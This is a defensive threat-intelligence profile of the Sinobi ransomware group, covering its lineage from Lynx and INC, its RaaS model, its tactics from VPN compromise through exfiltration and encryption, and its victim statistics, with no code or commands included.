The Sinobi ransomware group first emerged in late June 2025, with significantly increased activity in July 2025, which has continued steady throughout the rest of 2025. The group employs dual extortion in their attacks, thereby doubling the pressure to pay on victim organizations.
Due to similarities in the code, TTPs, and data leak sites (DLS), it is widely believed that Sinobi is an offshoot or rebrand of the Lynx and INC ransomware groups. There is an even chance that Sinobi operators purchased INC Ransom code that was listed for sale in May 2024 for $300,000 USD. All three groups remain active into 2026; it is not known if the operations are being operated in tandem or are separate operations built on shared source code.
The group operates under a semi-private Ransomware-As-A-Service (RaaS) model and employs dual extortion to ensure payout. The group appears to only work with known, vetted affiliates, who conduct the attacks themselves in exchange for shared profits. Since they don’t work with individuals they don’t already know, information about them and their operations is limited. This has the added benefit of increasing their operational security, suggesting well-connected and experienced operators.
Several reports suggest significant overlaps between Sinobi ransomware and Lynx/INC ransomware variants. In addition, the TOR-based data leak sites for these groups are all very similar in appearance, emphasizing similarities between the groups. Clear web mirrors exist as well.
According to public reporting, the group gains access into victim environments through compromise or exploitation of edge software/devices.
In specific cases, ESentire reported the group gaining access through a public facing SSL VPN via valid account compromise (the account was an MSP account that mapped to a Domain Admin account in the environment).
While in this instance, the group used valid credentials to gain access to the environment via compromised credentials, the group has also been known to exploit vulnerable SonicWall VPNs. Surefire has reported specific vulnerabilities related to SonicWall compromises – CVE-2024-53704. This vulnerability allows attackers to bypass authentication mechanisms and hijack active VPN sessions.
Like many other groups, Sinobi primarily uses RDP and share mounts as their lateral movement mechanisms. This is performed under the user contexts of either compromised users or users created by the group. They utilize valid compromised accounts and newly created accounts to move throughout a victim environment and ultimately to rapidly deploy ransomware.
The group has also been observed enumerating USB devices, potentially suggesting some ability to propagate through infected USB devices.
The group has been observed deploying RMMs (AnyDesk) to ensure persistent access to a host. Additionally, the group has been observed altering user permissions to have higher access as well as creating new domain administrators. This doubles as privilege escalation.
Sinobi has been observed attempting to uninstall security software and deleting shadows on targets, an attempt to impede recovery operations.
The group employs the dual extortion method to increase the pressure on victims to pay. This means that they steal data as well as encrypt environments. The group has been observed using RClone and WinSCP to exfiltrate data to cloud storage.
Once data is exfiltrated, Sinobi ransomware is deployed, resulting in encryption of the environment. Binary analysis suggests heavy overlap between Sinobi ransomware samples and INC/Lynx ransomware samples.
According to Halcyon, the group primarily targets organizations making $10-$50 million a year, helping guarantee a decent payout for their effort. In 2025, their top vertical was Manufacturing, with Construction & Engineering, Healthcare, and Professional & Commercial Services close behind.
Sinobi claimed 176 attacks from their first known attack on June 7th, 2025 to the end of 2025. Victims have resided in 19 different countries with the vast bulk of organizations residing in the United States.
